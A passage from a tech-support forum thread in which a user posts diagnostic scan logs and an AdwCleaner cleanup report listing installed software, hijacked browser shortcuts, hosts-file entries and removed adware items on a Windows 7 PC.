    Java 8 Update 211 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180211F0}) (Version: 8.0.2110.12 - Oracle Corporation)
    Jihosoft Android Phone Recovery version 5.2.0.1 (HKLM-x32\...\{01F86EE4-6518-4BB2-8D11-0039134A6376}_is1) (Version: 5.2.0.1 - HONGKONG JIHO CO., LIMITED)
    K-Lite Codec Pack 11.5.5 Full (HKLM-x32\...\KLiteCodecPack_is1) (Version: 11.5.5 - )
    Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
    League of Legends (HKLM-x32\...\{E80C09B5-A296-47E9-BD4B-BCCF2FDCA13E}) (Version: 4.1.2 - Riot Games) Hidden
    League of Legends (HKLM-x32\...\League of Legends 4.1.2) (Version: 4.1.2 - Riot Games)
    LeoRPG version 1.0.1.6 (HKLM-x32\...\{8D66928D-58E4-4E51-96BE-931E7BC2F9DB}_is1) (Version: 1.0.1.6 - DamenSpike GAMES HQ)
    Lightshot-5.4.0.35 (HKLM-x32\...\{30A5B3C9-2084-4063-A32A-628A98DE512B}_is1) (Version: 5.4.0.35 - Skillbrains)
    Logitech Gaming Software 9.02 (HKLM\...\Logitech Gaming Software) (Version: 9.02.65 - Logitech Inc.)
    MacroRecorder v1.0.67 (HKLM-x32\...\MacroRecorder_is1) (Version: 1.0.67 - Bartels Media GmbH)
    Malwarebytes version 3.8.3.2965 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.8.3.2965 - Malwarebytes)
    Microsoft Chart Controls for Microsoft .NET Framework 3.5 (HKLM-x32\...\{41785C66-90F2-40CE-8CB5-1C94BFC97280}) (Version: 3.5.0.0 - Microsoft Corporation)
    Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4420.1017 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable - x64 8.0.61000 (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable - x86 8.0.61001 (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
    Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
    Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
    Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
    Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24212 (HKLM-x32\...\{323dad84-0974-4d90-a1c1-e006c7fdbb7d}) (Version: 14.0.24212.0 - Microsoft Corporation)
    Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24212 (HKLM-x32\...\{462f63a8-6347-4894-a1b3-dbfe3a4c981d}) (Version: 14.0.24212.0 - Microsoft Corporation)
    Minecraft Launcher (HKLM-x32\...\{E154B2C8-2F3E-4763-B3D5-E7D34AE39C6B}) (Version: 1.0.0.0 - Mojang)
    Minecraft1.6.2 (HKLM-x32\...\Minecraft1.6.2) (Version: - )
    NVIDIA Graphics Driver 334.89 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 334.89 - NVIDIA Corporation)
    NVIDIA Update 11.10.13 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 11.10.13 - NVIDIA Corporation)
    Outils de vérification linguistique 2013 de Microsoft Office - Français (HKLM\...\{90150000-001F-040C-1000-0000000FF1CE}) (Version: 15.0.4420.1017 - Microsoft Corporation) Hidden
    Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7177 - Realtek Semiconductor Corp.)
    Roblox Player (HKLM-x32\...\roblox-player) (Version: - Roblox Corporation)
    Roblox Player for ADMIN (HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\roblox-player) (Version: - Roblox Corporation)
    Roblox Studio for ADMIN (HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\roblox-studio) (Version: - Roblox Corporation)
    Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.2.3.8 - Rockstar Games)
    Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
    Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
    VLC media player (HKLM\...\VLC media player) (Version: 2.2.1 - VideoLAN)
    Warframe (HKLM-x32\...\{5B4B99C8-B4F3-4F58-AD64-9869A4340775}) (Version: 1.0.0 - Digital Extremes)
    Warframe (HKLM-x32\...\{798E61DA-5E91-4A0B-B5B5-88C056F445BD}) (Version: 1.0.0 - Digital Extremes)
    WinRAR 5.30 beta 6 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.30.6 - win.rar GmbH)
    WolfQuest (HKLM-x32\...\{9E6AD6CF-1EFF-43E4-86C4-5C00254C3D8E}) (Version: 2.5.1 - eduweb)

    ==================== Custom CLSID (Whitelisted): ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2015-10-27] (win.rar GmbH -> Alexander Roshal)
    ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2015-10-27] (win.rar GmbH -> Alexander Roshal)
    ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-06-26] (Malwarebytes Corporation -> Malwarebytes)
    ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2014-02-08] (NVIDIA Corporation -> NVIDIA Corporation)
    ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-06-26] (Malwarebytes Corporation -> Malwarebytes)
    ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2015-10-27] (win.rar GmbH -> Alexander Roshal)
    ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2015-10-27] (win.rar GmbH -> Alexander Roshal)

    ==================== Shortcuts & WMI ========================

    (The entries could be listed to be restored or removed.)


    ShortcutWithArgument: C:\Users\ADMIN\Desktop\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
    ShortcutWithArgument: C:\Users\ADMIN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
    ShortcutWithArgument: C:\Users\ADMIN\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> %SNP%

    ==================== Loaded Modules (Whitelisted) ==============

    2019-07-09 16:56 - 2017-05-23 14:59 - 000494080 _____ (Skillbrains) [File not signed] C:\Program Files (x86)\Skillbrains\lightshot\5.4.0.35\Lightshot.dll
    2019-07-09 16:56 - 2017-05-23 14:59 - 000478208 _____ (Skillbrains) [File not signed] C:\Program Files (x86)\Skillbrains\lightshot\5.4.0.35\Lightshot.exe
    2019-07-09 16:56 - 2017-05-23 14:59 - 000256000 _____ (Skillbrains) [File not signed] C:\Program Files (x86)\Skillbrains\lightshot\5.4.0.35\uploader.dll
    2018-04-06 23:59 - 2018-04-06 23:59 - 002286747 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Logitech Gaming Software\LIBEAY32.dll
    2018-04-06 23:59 - 2018-04-06 23:59 - 000416627 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Logitech Gaming Software\ssleay32.dll

    ==================== Alternate Data Streams (Whitelisted) =========

    (If an entry is included in the fixlist, only the ADS will be removed.)


    ==================== Safe Mode (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

    ==================== Association (Whitelisted) ===============

    (If an entry is included in the fixlist, the registry item will be restored to default or removed.)


    ==================== Internet Explorer trusted/restricted ===============

    (If an entry is included in the fixlist, it will be removed from the registry.)

    IE trusted site: HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\dell.com -> dell.com
    IE trusted site: HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\roblox.com -> hxxp://www.roblox.com

    ==================== Hosts content: ==========================

    (If needed Hosts: directive could be included in the fixlist to reset Hosts.)

    2009-07-14 08:04 - 2019-07-08 16:13 - 000000292 _____ C:\Windows\system32\drivers\etc\hosts

    127.0.0.1 space1.adminpressure.space
    127.0.0.1 trackpressure.website
    127.0.0.1 htagzdownload.pw
    127.0.0.1 360devtraking.website
    127.0.0.1 room1.360dev.info
    127.0.0.1 djapp.info
    127.0.0.1 sharefolder.online
    127.0.0.1 telechargini.com
    127.0.0.1 fffffk.xyz
    127.0.0.1 smarttrackk.xyz

    ==================== Other Areas ============================

    (Currently there is no automatic fix for this section.)

    HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\ADMIN\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
    DNS Servers: 192.168.100.1
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
    Windows Firewall is enabled.

    ==================== MSCONFIG/TASK MANAGER disabled items ==

    If an entry is included in the fixlist, it will be removed.

    MSCONFIG\startupreg: RGSC => C:\Program Files (x86)\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe /silent
    MSCONFIG\startupreg: uTorrent => "C:\Users\ADMIN\AppData\Roaming\uTorrent\uTorrent.exe" /MINIMIZED
    MSCONFIG\startupreg: World of Tanks => "C:\Games\World_of_Tanks\WargamingGameUpdater.exe"
    MSCONFIG\startupreg: World of Tanks (1) => "E:\Games\World_of_Tanks\WargamingGameUpdater.exe"

    ==================== FirewallRules (Whitelisted) ===============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    FirewallRules: [TCP Query User{52DDF8E9-A118-4B78-9DA7-EAB59DABC8EF}C:\program files (x86)\google\chrome\application\chrome.exe] => (Block) C:\program files (x86)\google\chrome\application\chrome.exe (Google LLC -> Google LLC)
    FirewallRules: [UDP Query User{205D1C76-7C16-40A3-A295-AB068286A2E4}C:\program files (x86)\google\chrome\application\chrome.exe] => (Block) C:\program files (x86)\google\chrome\application\chrome.exe (Google LLC -> Google LLC)
    FirewallRules: [TCP Query User{DC137F74-440D-4B05-82AF-42B3E8B20B1D}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe (Logitech Inc -> Logitech Inc.)
    FirewallRules: [UDP Query User{9B40AC88-5BE8-4B55-8DC9-9E4C0AD08900}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe (Logitech Inc -> Logitech Inc.)
    FirewallRules: [TCP Query User{AE56C7AB-741A-403A-B509-436372F24247}C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe
    FirewallRules: [UDP Query User{52953CC1-6C3E-4955-BF06-31CFEB302AF7}C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe

    ==================== Restore Points =========================

    14-07-2019 14:27:24 Scheduled Checkpoint

    ==================== Faulty Device Manager Devices =============


    ==================== Event log errors: =========================

    Application errors:
    ==================
    Error: (07/15/2019 04:14:03 PM) (Source: Office 2013 Licensing Service) (EventID: 0) (User: )
    Description: Event-ID 0

    Error: (07/14/2019 01:44:54 PM) (Source: Office 2013 Licensing Service) (EventID: 0) (User: )
    Description: Event-ID 0

    Error: (07/13/2019 04:11:47 PM) (Source: Office 2013 Licensing Service) (EventID: 0) (User: )
    Description: Event-ID 0

    Error: (07/13/2019 07:01:05 AM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: mbamservice.exe, version: 3.2.0.845, time stamp: 0x5d10ed55
    Faulting module name: ntdll.dll, version: 6.1.7600.16385, time stamp: 0x4a5be02b
    Exception code: 0xc0000005
    Fault offset: 0x000000000004d174
    Faulting process id: 0x748
    Faulting application start time: 0x01d5391a14e592cd
    Faulting application path: C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe
    Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
    Report Id: e112c56b-a50d-11e9-850a-eca86b72ed8f

    Error: (07/12/2019 08:01:49 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
    Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.
    .

    Error: (07/12/2019 08:01:48 PM) (Source: MsiInstaller) (EventID: 1024) (User: NT AUTHORITY)
    Description: Product: Adobe Acrobat Reader DC - Update 'Adobe Acrobat Reader DC
    (19.010.20098)' could not be installed. Error code 1603. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft.com/fwlink/?LinkId=23127

    Error: (07/12/2019 08:01:44 PM) (Source: MsiInstaller) (EventID: 11722) (User: NT AUTHORITY)
    Description: Product: Adobe Acrobat Reader DC -- Error 1722.There is a problem with this Windows Installer package. A program run as part of the setup did not finish as expected. Contact your support personnel or package vendor. Action InstallWebResources, location: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe, command: 19.010.20098 17.012.20098.1

    Error: (07/12/2019 08:01:10 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
    Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.
    .


    System errors:
    =============
    Error: (07/15/2019 04:37:22 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
    Description: The HWDeviceService64.exe service terminated unexpectedly. It has done this 1 time(s).

    Error: (07/15/2019 04:36:53 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
    Description: The Logitech CPU Core Tempurature service failed to start due to the following error:
    Windows cannot verify the digital signature for this file. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Error: (07/15/2019 04:35:52 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
    Description: The WMI Performance Adapter service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 120000 milliseconds: Restart the service.

    Error: (07/15/2019 04:35:52 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
    Description: The Logitech Gaming Registry Service service terminated unexpectedly. It has done this 1 time(s).

    Error: (07/15/2019 04:35:52 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
    Description: The Windows Media Player Network Sharing Service service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 30000 milliseconds: Restart the service.

    Error: (07/15/2019 04:35:52 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
    Description: The Adobe Acrobat Update Service service terminated unexpectedly. It has done this 1 time(s).

    Error: (07/15/2019 04:35:52 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
    Description: The NVIDIA Display Driver Service service terminated unexpectedly. It has done this 1 time(s).

    Error: (07/15/2019 04:03:54 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
    Description: The HWDeviceService64.exe service terminated unexpectedly. It has done this 1 time(s).


    Windows Defender:
    ===================================
    Date: 2018-07-09 16:31:35.852
    Description:
    Windows Defender scan has been stopped before completion.
    Scan ID:{0E735C6C-5437-4DB1-84A0-257CEA6AD9FF}
    Scan Type:AntiSpyware
    Scan Parameters:Quick Scan

    Date: 2018-02-28 20:59:13.565
    Description:
    Windows Defender scan has been stopped before completion.
    Scan ID:{21FC7961-5BE5-47ED-B9B2-A434EAC5D866}
    Scan Type:AntiSpyware
    Scan Parameters:Quick Scan

    CodeIntegrity:
    ===================================

    Date: 2019-07-15 16:36:53.482
    Description:
    Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\LgCoreTemp.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2019-07-15 16:36:53.482
    Description:
    Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\LgCoreTemp.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2019-07-15 16:03:24.102
    Description:
    Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\LgCoreTemp.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2019-07-15 16:03:24.102
    Description:
    Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\LgCoreTemp.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2019-07-14 19:40:12.462
    Description:
    Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\LgCoreTemp.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2019-07-14 19:40:12.462
    Description:
    Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\LgCoreTemp.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2019-07-14 13:34:23.735
    Description:
    Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\LgCoreTemp.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2019-07-14 13:34:23.725
    Description:
    Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\LgCoreTemp.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    ==================== Memory info ===========================

    BIOS: Intel Corp. HOH6110H.86A.0010.2012.0424.1632 04/24/2012
    Motherboard: Intel Corporation DH61HO
    Processor: Intel(R) Core(TM) i3-2100 CPU @ 3.10GHz
    Percentage of memory in use: 95%
    Total physical RAM: 4066.59 MB
    Available physical RAM: 174.61 MB
    Total Virtual: 8131.34 MB
    Available Virtual: 3647.34 MB

    ==================== Drives ================================

    Drive c: () (Fixed) (Total:68.26 GB) (Free:5.26 GB) NTFS
    Drive d: (New Volume) (Fixed) (Total:97.66 GB) (Free:16.38 GB) NTFS
    Drive e: (New Volume) (Fixed) (Total:202.09 GB) (Free:69.39 GB) NTFS
    Drive f: (New Volume) (Fixed) (Total:97.66 GB) (Free:41.02 GB) NTFS

    \\?\Volume{37239b48-8526-11e5-b222-806e6f6e6963}\ (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: 24899F4E)
    Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
    Partition 2: (Not Active) - (Size=68.3 GB) - (Type=07 NTFS)
    Partition 3: (Not Active) - (Size=97.7 GB) - (Type=07 NTFS)
    Partition 4: (Not Active) - (Size=299.7 GB) - (Type=0F Extended)

    ==================== End of Addition.txt ============================
     
  15. nekoshoyo

    nekoshoyo Thread Starter

    Joined:
    Jul 9, 2019
    Messages:
    12
    Adwcleaner:

    # -------------------------------
    # Malwarebytes AdwCleaner 7.3.0.0
    # -------------------------------
    # Build: 04-04-2019
    # Database: 2019-06-28.1 (Cloud)
    # Support: https://www.malwarebytes.com/support
    #
    # -------------------------------
    # Mode: Clean
    # -------------------------------
    # Start: 07-15-2019
    # Duration: 00:00:07
    # OS: Windows 7 Ultimate
    # Cleaned: 82
    # Failed: 0


    ***** [ Services ] *****

    No malicious services cleaned.

    ***** [ Folders ] *****

    Deleted C:\ProgramData\ByteFence
    Deleted C:\ProgramData\EmailNotifier
    Deleted C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WajaNEn
    Deleted C:\ProgramData\Tencent
    Deleted C:\Users\ADMIN\AppData\Local\YSearchUtil
    Deleted C:\Users\ADMIN\AppData\Roaming\RPEng
    Deleted C:\Users\ADMIN\AppData\Roaming\Tencent
    Deleted C:\Users\children\AppData\LocalLow\mystarttb
    Deleted C:\Windows\Installer\{5266F634-7B7D-4537-BDDC-98DD6CFCBAA1}
    Deleted C:\Windows\SysWOW64\config\systemprofile\AppData\Local\YSearchUtil
    Deleted C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent

    ***** [ Files ] *****

    Deleted C:\Users\children\AppData\Roaming\Mozilla\Firefox\Profiles\9sw0nvn7.default\searchplugins\findit.xml

    ***** [ DLL ] *****

    No malicious DLLs cleaned.

    ***** [ WMI ] *****

    No malicious WMI cleaned.

    ***** [ Shortcuts ] *****

    Deleted C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
    Deleted C:\Users\ADMIN\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk
    Deleted C:\Users\ADMIN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
    Deleted C:\Users\ADMIN\Desktop\Internet Explorer.lnk
    Deleted C:\Users\children\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
    Deleted C:\Users\children\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk
    Deleted C:\Users\children\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
    Deleted C:\Users\children\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
    Deleted C:\Users\children\Desktop\Google Chrome.lnk

    ***** [ Tasks ] *****

    No malicious tasks cleaned.

    ***** [ Registry ] *****

    Deleted HKCU\Environment|SNP
    Deleted HKCU\Software\AppDataLow\Software\mystarttb
    Deleted HKCU\Software\DreamTrips
    Deleted HKCU\Software\EpicNet Inc.
    Deleted HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{CCB24E92-62C4-4C53-95D2-65F9EED476BC}
    Deleted HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CCB24E92-62C4-4C53-95D2-65F9EED476BC}
    Deleted HKCU\Software\PRODUCTSETUP
    Deleted HKCU\Software\ProductSetup\Uninstall\0B2U2Z1P0F1P1G1R1P1V0A1Q1Q0O1G
    Deleted HKCU\Software\ProductSetup\Uninstall\0S1P1T1C1R1MtT0P1C1F2X1L1Q1P1QtT1S2UtT0Y1T1M1F1F
    Deleted HKCU\Software\WajIEnhance
    Deleted HKCU\Software\csastats
    Deleted HKCU\Software\drpsu
    Deleted HKCU\Software\mtQuoteex
    Deleted HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\26D9E607FFF0C58C7844B47FF8B6E079E5A2220E
    Deleted HKLM\SOFTWARE\MICROSOFT\Speedycar
    Deleted HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\Quoteex.exe
    Deleted HKLM\SOFTWARE\Microsoft\RADAR\HeapLeakDetection\DiagnosedApplications\ByteFence.exe
    Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Homeville Launcher
    Deleted HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Reason\ReasonByteFence
    Deleted HKLM\Software\Classes\Installer\Features\436F6625D7B77354DBCD89DDC6CFAB1A
    Deleted HKLM\Software\Classes\Installer\Products\436F6625D7B77354DBCD89DDC6CFAB1A
    Deleted HKLM\Software\Classes\Interface\{47A1DF02-BCE4-40C3-AE47-E3EA09A65E4A}
    Deleted HKLM\Software\Classes\Interface\{FA7B2795-C0C8-4A58-8672-3F8D80CC0270}
    Deleted HKLM\Software\Classes\METNSD
    Deleted HKLM\Software\Classes\TypeLib\{1112F282-7099-4624-A439-DB29D6551552}
    Deleted HKLM\Software\MICROSOFT\TechnologyDesktopnew
    Deleted HKLM\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{607B689F-7600-45E4-B8E5-887F72DAB15C}
    Deleted HKLM\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A2159D33-3CE2-401B-8967-1B270628A311}
    Deleted HKLM\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0D4A4BC-F7CD-436E-B1FA-25637BA0F5BE}
    Deleted HKLM\Software\Microsoft\Internet Explorer\SearchScopes|DoNotAskAgain
    Deleted HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\436F6625D7B77354DBCD89DDC6CFAB1A
    Deleted HKLM\Software\WajaNEn
    Deleted HKLM\Software\Wow6432Node\Email Notifier
    Deleted HKLM\Software\Wow6432Node\Microleaves
    Deleted HKLM\Software\Wow6432Node\WajaNEn
    Deleted HKLM\Software\Wow6432Node\\Classes\CLSID\{47A1DF02-BCE4-40C3-AE47-E3EA09A65E4A}
    Deleted HKLM\Software\Wow6432Node\\Classes\CLSID\{B853E835-9F24-4F4B-B55C-E554D15CCCD2}
    Deleted HKLM\Software\Wow6432Node\\Classes\CLSID\{B9D64D3B-BE75-4FA2-B94A-C4AE772A0146}
    Deleted HKLM\Software\Wow6432Node\\Classes\CLSID\{F83D1872-D9FF-47F8-B5A0-49CC51E24EE8}
    Deleted HKLM\Software\Wow6432Node\\Classes\Interface\{47A1DF02-BCE4-40C3-AE47-E3EA09A65E4A}
